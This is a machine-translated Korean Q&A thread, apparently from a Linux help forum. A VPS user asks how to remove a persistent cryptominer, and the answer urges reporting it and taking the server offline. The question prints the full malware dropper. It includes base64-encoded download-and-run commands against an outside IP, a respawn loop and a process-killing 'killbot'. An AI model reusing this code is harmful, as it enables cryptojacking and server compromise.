제가 사용하고 있는 VPS에서 왠지 약간 짜증나는 채굴자를 발견했습니다. (저는 루트가 아닙니다)
15109 ? Z 0:00 [sh] <defunct>
15134 ? Ssl 0:03 []
15160 ? S 0:00 ./5DiaEd75 ./bNlMGMON
15162 ? S 0:00 ./5DiaEd75 ./bnkI202h
15183 ? S 0:00 sleep 5
15184 ? S 0:00 sleep 5
매번 /var/tmp와 다른 이름으로 시작됩니다. 내가 볼 수 있는 한, 내가 그것을 죽인 후 언젠가 transfer.sh에서 파일을 다운로드했습니다. (나중에 편집: 스크립트는 transfer.sh에서 왔는데, 저는 웹사이트인 줄 알았습니다.) (이것은 내가 스토킹에서 얻은 것입니다. 안에 ps x)
47067 ? S 0:00 sh -c echo -n 'd2dldCAtcSAtTyAtIGh0dHA6Ly8yMDQuNDguMjQuNzIvaW5kZXguaHRtbCB8IGJhc2g=' | base64 -d | bash
47070 ? S 0:00 bash
47072 ? S 0:00 bash
47088 ? S 0:00 wget http://204.48.24.72/zeenuts -O ./0amdpE5K
crontab을 확인했는데 거기에 아무것도 없습니다. 거기에 무언가를 넣으면 프로세스가 시작된 후에 삭제됩니다. 나는 이 일이 시작되기 전에도 보았습니다.
27985 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t -f root
나는 이 일을 없앨 수 없다. crontab을 사용하지 않고 cron과 유사한 작업을 설정하는 방법이 있습니까? 아니면 Sendmail 기능을 사용하시나요? [] 프로세스를 사용하면 lsof/에서 실행되며 /var/tmp에서도 2개의 실행 파일을 다운로드합니다.
/user/bin/sendmail은 crontab에서 명령을 설정하고 실행할 때마다 시작된다는 것을 알았기 때문에 관련이 없을 수 있습니다. crontab 작업에 대해 관리자가 지정한 설정일 수 있습니다.
2.6.32-642.el6.x86_64
CentOS release 6.8 (Final)
나는 스크립트를 보았다 :
#<!--
function random() {
chars=abcdefghijklmnop1234567890ABCDEFGHIJKLMNOP
for i in {1..8} ; do
echo -n ${chars:RANDOM%${#chars}:1}
done
}
new_bash=$(random)
new_daemon=$(random)
new_killbot=$(random)
new_payload=$(random)
crontab -r
writable_path=("/var/tmp" "/tmp" `pwd`)
for install_path in ${writable_path[@]}
do
cd $install_path
rm -rf touch ponezz
cp `command -v touch` ./touch
./touch ./ponezz
if [ ! -f ./ponezz ]; then
continue
else
rm -rf touch ponezz
break
fi
done
if [ $(command -v wget | wc -l) -eq 1 ]; then
wget http://204.48.24.72/zeenuts -O ./$new_payload
elif [ $(command -v curl | wc -l) -eq 1 ]; then
curl http://204.48.24.72/zeenuts -o ./$new_payload
elif [ $(command -v python | wc -l) -eq 1 ]; then
if [ $(python -V 2>&1 | sed 's/.* \([0-9]\).\([0-9]\).*/\1\2/') -lt "30" ]; then
python -c "from urllib import urlretrieve; urlretrieve('http://204.48.24.72/zeenuts', './$new_payload')"
else
python -c "from urllib.request import urlretrieve; urlretrieve('http://204.48.24.72/zeenuts', './$new_payload')"
fi
fi
chmod 777 ./$new_payload
nohup ./$new_payload
./$new_payload
echo "sleep 2;rm "'$0'" ;while true;do sleep 5; ps x | grep -F '[]' | grep -v grep;if [ "'$?'" -eq 1 ]; then chmod 777 ./$new_payload;nohup ./$new_payload;./$new_payload;fi;ps | grep -F '[]' | grep -v grep | awk '{print "'$1'"}' | awk '{if(NR>1)print}' | xargs -n1 kill -9;done" | tee ./$new_daemon
echo -n 'c2xlZXAgMjtybSAkMCA7d2hpbGUgdHJ1ZTtkbyBzbGVlcCA1OyBwcyBhdXggfGdyZXAgLXYgLUYgJ1tdJyB8IGF3ayAne2lmKCQzPjQwLjApIHByaW50ICQyfScgfCB3aGlsZSByZWFkIHByb2NpZDsgZG8ga2lsbCAtOSAkcHJvY2lkOyBkb25lO2RvbmU=' | base64 -d | tee ./$new_killbot
cp `command -v bash` ./$new_bash
./$new_bash ./$new_daemon &
./$new_bash ./$new_killbot &
흥미로운 작은 스크립트이지만 어떻게 계속 부팅되는지 모르겠습니다.
답변1
귀하는 감염된 컴퓨터의 소유자나 관리자가 아니므로 해당 컴퓨터를 소유하거나 관리하는 사람에게 상황을 보고해야 합니다. 이들은 즉각적인 조치가 필요한 지속적인 보안 위반에 직면해 있습니다.
이는 "무해한" 비트코인 광부일 수도 있고, 비트코인 광부(실제로 그렇다면)가 탐지할 수 있는 유일한 프로세스일 가능성이 높습니다. 문제가 되지 않습니다. 컴퓨터가 손상되었으므로 즉시 인터넷에서 제거해야 합니다.
또한보십시오
- 감염된 서버를 처리하는 방법은 무엇입니까?(보안 SE에서).
- 감염된 서버를 처리하는 방법은 무엇입니까?(서버 장애시).
저는 이 상황을 DigitalOcean(base64로 인코딩된 문자열의 IP 주소가 속한 사람)에 보고하고 이 U&L 문제에 대한 포인터를 첨부했습니다.